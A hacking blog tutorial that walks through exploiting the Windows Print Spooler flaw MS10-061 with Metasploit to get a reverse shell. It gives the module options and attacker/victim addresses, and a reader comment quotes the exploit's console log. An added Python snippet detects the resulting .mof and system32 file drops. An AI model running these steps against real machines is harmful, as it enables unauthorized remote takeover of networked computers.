Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5


Type : Tutorial

Level : Medium

Victim O.S : Windows XP SP3 (also Windows 7, Windows Server 2008, Windows Vista)

Attacker O.S : Backtrack 5 R1

Threat : Critical

Have you ever seen someone sharing their printer inside a network? If you work in an office you probably see this every day: a printer connected to a computer, with that computer acting as a print server. This vulnerability is not about the print server itself, though, but about the service behind printer sharing in Windows, the Print Spooler. In this tutorial we will try to hack Windows via the Windows printer sharing service.

This is the description of the exploit according to the Metasploit website:

This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management Instrumentation (WMI) to deploy applications. This directory (Wbem\Mof) is periodically scanned and any new .mof files are processed automatically. This is the same technique employed by the Stuxnet code found in the wild.

You'll probably get impatient if I write too much intro :-P so… let's start the tutorial.

Requirements :

1. Metasploit framework

Step by Step :

1. First, explore your network locations and find shared printers. Below is a screenshot taken when I found an active printer share on my network.

[Screenshot: an active printer share found on the network]

2. Yep, we've got one victim there. Now prepare the Metasploit console by running the msfconsole command, then use the ms10_061 exploit and set up the payload.

[Screenshot: msfconsole with the exploit and payload selected]

3. To view the available options, use the show options command. The screenshot below shows my option configuration for the attack.

[Screenshot: show options output with the configured options]

Information :

set pname canon --> sets the printer share name (see step 1)

set rhost 192.168.8.94 --> IP address of the host sharing the printer

set lhost 192.168.8.92 --> attacker's local address
(use ifconfig to view your IP)

set lport 443 --> port on our computer that the victim connects back to

4. Okay, at this point everything is set up and we are ready to attack the victim. Let's run the exploit command to perform the attack and see whether we can pwn it or not.

[Screenshot: running the exploit command]

5. Yep, everything ran nicely. The final result, after waiting for the session:

[Screenshot: session opened on the victim]

We owned the machine :-P

Countermeasures :

1. Always keep your operating system updated.
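Beyond patching, the technique leaves two artefacts a defender can watch for: an executable written into system32 by the Print Spooler, and a new .mof file in the WMI auto-compile directory (Wbem\Mof), which WMI compiles and runs. The Python below is an added detection example, not part of the original tutorial; it assumes file-creation events from some file-monitoring sensor that carry the path and the writing process's image name, and a default C:\Windows install.

```python
import ntpath  # Windows path semantics, usable on any host
from dataclasses import dataclass

# Hypothetical detection logic, not part of the tutorial: flag the two artefacts the
# MS10-061 module leaves behind, an executable written into system32 by the Print
# Spooler and a .mof file dropped into the WMI auto-compile directory.
SYSTEM32 = r"C:\Windows\system32"
MOF_AUTOCOMPILE_DIR = ntpath.join(SYSTEM32, "wbem", "mof")
EXECUTABLE_EXTS = {".exe", ".dll", ".scr", ".com"}

@dataclass
class FileEvent:
    path: str     # full path of the created file, as reported by a file-monitoring sensor
    process: str  # image name of the process that wrote it

def _norm(path):
    # Sensors may log %SystemRoot% or the expanded path; assume a default
    # C:\Windows install so both forms compare equal after case folding.
    return ntpath.normcase(path.replace("%SystemRoot%", r"C:\Windows"))

def _in_dir(path, directory):
    # Exact directory match: subdirectories such as system32\drivers do not count.
    return ntpath.dirname(_norm(path)) == ntpath.normcase(directory)

def classify(event):
    """Return a finding name for a suspicious write, or None for benign events."""
    ext = ntpath.splitext(event.path)[1].lower()
    if _in_dir(event.path, MOF_AUTOCOMPILE_DIR) and ext == ".mof":
        return "mof_autocompile_drop"  # whatever the writer: WMI compiles and runs it
    if (event.process.lower() == "spoolsv.exe" and _in_dir(event.path, SYSTEM32)
            and ext in EXECUTABLE_EXTS):
        return "spooler_wrote_executable"
    return None

def detect(events):
    """Run classify over a batch of events and return (path, finding) pairs."""
    return [(e.path, f) for e in events if (f := classify(e)) is not None]

# Constructed sample events; the two suspicious file names are copied from the
# module output quoted in the comments on this post.
SAMPLE_EVENTS = [
    FileEvent(r"%SystemRoot%\system32\t1z9K0FhmmS7R4.exe", "spoolsv.exe"),
    FileEvent(r"C:\Windows\system32\wbem\mof\W2LbteYl5jKxTG.mof", "spoolsv.exe"),
    FileEvent(r"C:\Windows\system32\drivers\etc\hosts", "notepad.exe"),
    FileEvent(r"C:\Windows\system32\spool\PRINTERS\00012.SPL", "spoolsv.exe"),
]

if __name__ == "__main__":
    for path, finding in detect(SAMPLE_EVENTS):
        print(f"{finding}: {path}")
```

The spool file under system32\spool\PRINTERS is normal spooler activity and is deliberately not flagged, which keeps the rule quiet on ordinary print jobs.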

Hope you enjoyed :-)


About the author: blogger at hacking-tutorial.com. Loves PHP, offensive security and the web. Contact him at me[-at-]vishnuvalentino.com. Website: http://www.vishnuvalentino.com

  • TeDDy

    pwned!
    nice work bro… but that one was easy. :P

    • http://www.vishnuvalentino.com v4L

      #TeDDy
      Thank you bro!…

  • arnet

    [*] Started reverse handler on 192.168.137.1:4444
    [*] Trying target Windows Universal…
    [*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.137.224[\spoolss] …
    [*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.137.224[\spoolss] …
    [*] Attempting to exploit MS10-061 via \\192.168.137.224\Canon …
    [*] Printer handle: 000000005585a4496b34624594c9484db0f97737
    [*] Job started: 0x2
    [*] Wrote 73802 bytes to %SystemRoot%\system32\t1z9K0FhmmS7R4.exe
    [*] Job started: 0x3
    [*] Wrote 2220 bytes to %SystemRoot%\system32\wbem\mof\W2LbteYl5jKxTG.mof
    [*] Everything should be set, waiting for a session…

    No session is created… help me